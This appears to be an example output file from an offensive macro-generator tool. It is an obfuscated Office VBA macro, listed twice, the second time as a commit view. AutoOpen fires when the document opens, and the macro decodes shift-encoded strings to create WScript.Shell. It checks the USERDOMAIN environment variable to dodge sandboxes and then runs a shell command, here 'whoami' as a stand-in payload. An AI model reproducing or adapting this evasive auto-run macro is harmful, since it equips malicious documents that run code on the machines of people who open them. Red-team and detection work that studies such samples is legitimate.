MaliciousMacroGenerator/examples/generic-cmd-evasion.vba

Sub AutoOpen()
	Dim XHKmhxHQcRTz As String
	Dim THSEubLQvPSdELSuoGX As Object
	Dim FJGotBFzvCOdl As Integer
	Dim EeiAeMHMgPdtBzW As String
	Dim GGfyeZZ As String
	
	FJGotBFzvCOdl = 364
	XHKmhxHQcRTz = "[wgvmtx2Wlipp"
	GGfyeZZ = OguRQlS()
	If (GGfyeZZ = "NVKVXMEGmpW") Then 
		Set THSEubLQvPSdELSuoGX = CreateObject(kbilYvbsscC(XHKmhxHQcRTz))
		EeiAeMHMgPdtBzW = vmLhBnhohStHTGkJVFvtodv("bhEpnbsamPxDwVcWJzlublMQ")
		EeiAeMHMgPdtBzW = VBiSUNVKeBGIhcPkb(THSEubLQvPSdELSuoGX, EeiAeMHMgPdtBzW, FJGotBFzvCOdl)
	End If
End Sub

Function vmLhBnhohStHTGkJVFvtodv(ZROwKJd As String) As String
	Dim oVMgsBnBXNOpBX As String
	Dim OoSwSrwLrWhP As String
	Dim MJDDNqez As String
	MJDDNqez = "gqh2i|i$3g${lseqm"

	oVMgsBnBXNOpBX = MJDDNqez
	oVMgsBnBXNOpBX = kbilYvbsscC(oVMgsBnBXNOpBX)
	vmLhBnhohStHTGkJVFvtodv = oVMgsBnBXNOpBX
End Function

Function VBiSUNVKeBGIhcPkb(GKzgZylVXGWz As Object, SrTboMsIUaGgfoswbnqxNbDZ As String, GMIuliLqzJCayCzKHCoq As Integer) As String
	Dim fFOceCgNlEZwEpqr As String
	Dim ENFykwKonc As Integer
	ENFykwKonc = 4
	fFOceCgNlEZwEpqr = SrTboMsIUaGgfoswbnqxNbDZ
    If (GMIuliLqzJCayCzKHCoq > ENFykwKonc) Then
		ENFykwKonc = GMIuliLqzJCayCzKHCoq - GMIuliLqzJCayCzKHCoq
		GKzgZylVXGWz.Run fFOceCgNlEZwEpqr, ENFykwKonc, True
	End If
	fFOceCgNlEZwEpqr = "IjIurrYiWJxH"
	VBiSUNVKeBGIhcPkb = fFOceCgNlEZwEpqr
End Function


Function kbilYvbsscC(dfjsgXiTXlcBLjeRryfvoqY As String) As String
	Dim eqQwyyjmAEVAMy As Long
	Dim CdMxcxbCahltDjPZG As String
	Dim JBRbbDxDBbJIlOy As Integer
	JBRbbDxDBbJIlOy = 4
	For eqQwyyjmAEVAMy = 1 To Len(dfjsgXiTXlcBLjeRryfvoqY)
		CdMxcxbCahltDjPZG = CdMxcxbCahltDjPZG & Chr(Asc(Mid(dfjsgXiTXlcBLjeRryfvoqY, eqQwyyjmAEVAMy, 1)) - JBRbbDxDBbJIlOy)
	Next eqQwyyjmAEVAMy
	kbilYvbsscC = CdMxcxbCahltDjPZG
End Function

Function OguRQlS() As String
	Dim fHNbSbwUyNulLLVThkN As String
	fHNbSbwUyNulLLVThkN = "bhEpnbsamPxDwVcWJzlublMQ"
	fHNbSbwUyNulLLVThkN = qvAKTNfitsA(fHNbSbwUyNulLLVThkN)
	fHNbSbwUyNulLLVThkN = VpxqjMIiANZg(fHNbSbwUyNulLLVThkN)
	OguRQlS = fHNbSbwUyNulLLVThkN
End Function

Function VpxqjMIiANZg(fHNbSbwUyNulLLVThkN As String) As String
    Dim eeyJYtLZQheDgmcj As String
    Dim YxfUNvpKSEvuCWsQOQVDxf As String
    Dim yjsEKLikmZcAMAjWmV As String
    Dim GvMfkAxzfzgIhxFFInO As Integer
    GvMfkAxzfzgIhxFFInO = 637
    YxfUNvpKSEvuCWsQOQVDxf = "kbilYvbsscC"
    yjsEKLikmZcAMAjWmV = "VMRK^IV4"
    YxfUNvpKSEvuCWsQOQVDxf = MjOXrhwR(YxfUNvpKSEvuCWsQOQVDxf, yjsEKLikmZcAMAjWmV, GvMfkAxzfzgIhxFFInO)
    eeyJYtLZQheDgmcj = YxfUNvpKSEvuCWsQOQVDxf
    If (UCase(fHNbSbwUyNulLLVThkN) = eeyJYtLZQheDgmcj) Then
        VpxqjMIiANZg = "NVKVXMEGmpW"
    Else
        VpxqjMIiANZg = "bHWfwRqCNh"
    End If
End Function

Function qvAKTNfitsA(BMpIooCasKG As String) As String
    Dim ufvKyCNiHHogKLXqt As String
	Dim EqrXsnePmksKAhhYJzaBFIp As String
	Dim nEdEMfbClbgkYZTDjXJbia As Integer
	nEdEMfbClbgkYZTDjXJbia = 6104
	EqrXsnePmksKAhhYJzaBFIp = "kbilYvbsscC"
	EqrXsnePmksKAhhYJzaBFIp = btsMlRsLgrTbWEVydvEQpnAa(EqrXsnePmksKAhhYJzaBFIp, "YWIVHSQEMR", nEdEMfbClbgkYZTDjXJbia)
    ufvKyCNiHHogKLXqt = Environ(EqrXsnePmksKAhhYJzaBFIp)
    qvAKTNfitsA = ufvKyCNiHHogKLXqt
End Function

Function btsMlRsLgrTbWEVydvEQpnAa(pInSpXFfvHlmlwguszddsz As String, NCIYhLMxGmhRfSQD As String, NqYrqajngCuizeuhgQnf As Integer) As String
    If (NqYrqajngCuizeuhgQnf > 1) Then
        btsMlRsLgrTbWEVydvEQpnAa = Application.Run(pInSpXFfvHlmlwguszddsz, NCIYhLMxGmhRfSQD)
    End If
End Function
Create generic-cmd-evasion.vba 2016-11-11 20:31:15 +00:00			`Sub AutoOpen()`
			`Dim XHKmhxHQcRTz As String`
			`Dim THSEubLQvPSdELSuoGX As Object`
			`Dim FJGotBFzvCOdl As Integer`
			`Dim EeiAeMHMgPdtBzW As String`
			`Dim GGfyeZZ As String`

			`FJGotBFzvCOdl = 364`
			`XHKmhxHQcRTz = "[wgvmtx2Wlipp"`
			`GGfyeZZ = OguRQlS()`
			`If (GGfyeZZ = "NVKVXMEGmpW") Then`
			`Set THSEubLQvPSdELSuoGX = CreateObject(kbilYvbsscC(XHKmhxHQcRTz))`
			`EeiAeMHMgPdtBzW = vmLhBnhohStHTGkJVFvtodv("bhEpnbsamPxDwVcWJzlublMQ")`
			`EeiAeMHMgPdtBzW = VBiSUNVKeBGIhcPkb(THSEubLQvPSdELSuoGX, EeiAeMHMgPdtBzW, FJGotBFzvCOdl)`
			`End If`
			`End Sub`

			`Function vmLhBnhohStHTGkJVFvtodv(ZROwKJd As String) As String`
			`Dim oVMgsBnBXNOpBX As String`
			`Dim OoSwSrwLrWhP As String`
			`Dim MJDDNqez As String`
			`MJDDNqez = "gqh2i\|i$3g${lseqm"`

			`oVMgsBnBXNOpBX = MJDDNqez`
			`oVMgsBnBXNOpBX = kbilYvbsscC(oVMgsBnBXNOpBX)`
			`vmLhBnhohStHTGkJVFvtodv = oVMgsBnBXNOpBX`
			`End Function`

			`Function VBiSUNVKeBGIhcPkb(GKzgZylVXGWz As Object, SrTboMsIUaGgfoswbnqxNbDZ As String, GMIuliLqzJCayCzKHCoq As Integer) As String`
			`Dim fFOceCgNlEZwEpqr As String`
			`Dim ENFykwKonc As Integer`
			`ENFykwKonc = 4`
			`fFOceCgNlEZwEpqr = SrTboMsIUaGgfoswbnqxNbDZ`
			`If (GMIuliLqzJCayCzKHCoq > ENFykwKonc) Then`
			`ENFykwKonc = GMIuliLqzJCayCzKHCoq - GMIuliLqzJCayCzKHCoq`
			`GKzgZylVXGWz.Run fFOceCgNlEZwEpqr, ENFykwKonc, True`
			`End If`
			`fFOceCgNlEZwEpqr = "IjIurrYiWJxH"`
			`VBiSUNVKeBGIhcPkb = fFOceCgNlEZwEpqr`
			`End Function`


			`Function kbilYvbsscC(dfjsgXiTXlcBLjeRryfvoqY As String) As String`
			`Dim eqQwyyjmAEVAMy As Long`
			`Dim CdMxcxbCahltDjPZG As String`
			`Dim JBRbbDxDBbJIlOy As Integer`
			`JBRbbDxDBbJIlOy = 4`
			`For eqQwyyjmAEVAMy = 1 To Len(dfjsgXiTXlcBLjeRryfvoqY)`
			`CdMxcxbCahltDjPZG = CdMxcxbCahltDjPZG & Chr(Asc(Mid(dfjsgXiTXlcBLjeRryfvoqY, eqQwyyjmAEVAMy, 1)) - JBRbbDxDBbJIlOy)`
			`Next eqQwyyjmAEVAMy`
			`kbilYvbsscC = CdMxcxbCahltDjPZG`
			`End Function`

			`Function OguRQlS() As String`
			`Dim fHNbSbwUyNulLLVThkN As String`
			`fHNbSbwUyNulLLVThkN = "bhEpnbsamPxDwVcWJzlublMQ"`
			`fHNbSbwUyNulLLVThkN = qvAKTNfitsA(fHNbSbwUyNulLLVThkN)`
			`fHNbSbwUyNulLLVThkN = VpxqjMIiANZg(fHNbSbwUyNulLLVThkN)`
			`OguRQlS = fHNbSbwUyNulLLVThkN`
			`End Function`

			`Function VpxqjMIiANZg(fHNbSbwUyNulLLVThkN As String) As String`
			`Dim eeyJYtLZQheDgmcj As String`
			`Dim YxfUNvpKSEvuCWsQOQVDxf As String`
			`Dim yjsEKLikmZcAMAjWmV As String`
			`Dim GvMfkAxzfzgIhxFFInO As Integer`
			`GvMfkAxzfzgIhxFFInO = 637`
			`YxfUNvpKSEvuCWsQOQVDxf = "kbilYvbsscC"`
			`yjsEKLikmZcAMAjWmV = "VMRK^IV4"`
			`YxfUNvpKSEvuCWsQOQVDxf = MjOXrhwR(YxfUNvpKSEvuCWsQOQVDxf, yjsEKLikmZcAMAjWmV, GvMfkAxzfzgIhxFFInO)`
			`eeyJYtLZQheDgmcj = YxfUNvpKSEvuCWsQOQVDxf`
			`If (UCase(fHNbSbwUyNulLLVThkN) = eeyJYtLZQheDgmcj) Then`
			`VpxqjMIiANZg = "NVKVXMEGmpW"`
			`Else`
			`VpxqjMIiANZg = "bHWfwRqCNh"`
			`End If`
			`End Function`

			`Function qvAKTNfitsA(BMpIooCasKG As String) As String`
			`Dim ufvKyCNiHHogKLXqt As String`
			`Dim EqrXsnePmksKAhhYJzaBFIp As String`
			`Dim nEdEMfbClbgkYZTDjXJbia As Integer`
			`nEdEMfbClbgkYZTDjXJbia = 6104`
			`EqrXsnePmksKAhhYJzaBFIp = "kbilYvbsscC"`
			`EqrXsnePmksKAhhYJzaBFIp = btsMlRsLgrTbWEVydvEQpnAa(EqrXsnePmksKAhhYJzaBFIp, "YWIVHSQEMR", nEdEMfbClbgkYZTDjXJbia)`
			`ufvKyCNiHHogKLXqt = Environ(EqrXsnePmksKAhhYJzaBFIp)`
			`qvAKTNfitsA = ufvKyCNiHHogKLXqt`
			`End Function`

			`Function btsMlRsLgrTbWEVydvEQpnAa(pInSpXFfvHlmlwguszddsz As String, NCIYhLMxGmhRfSQD As String, NqYrqajngCuizeuhgQnf As Integer) As String`
			`If (NqYrqajngCuizeuhgQnf > 1) Then`
			`btsMlRsLgrTbWEVydvEQpnAa = Application.Run(pInSpXFfvHlmlwguszddsz, NCIYhLMxGmhRfSQD)`
			`End If`
			`End Function`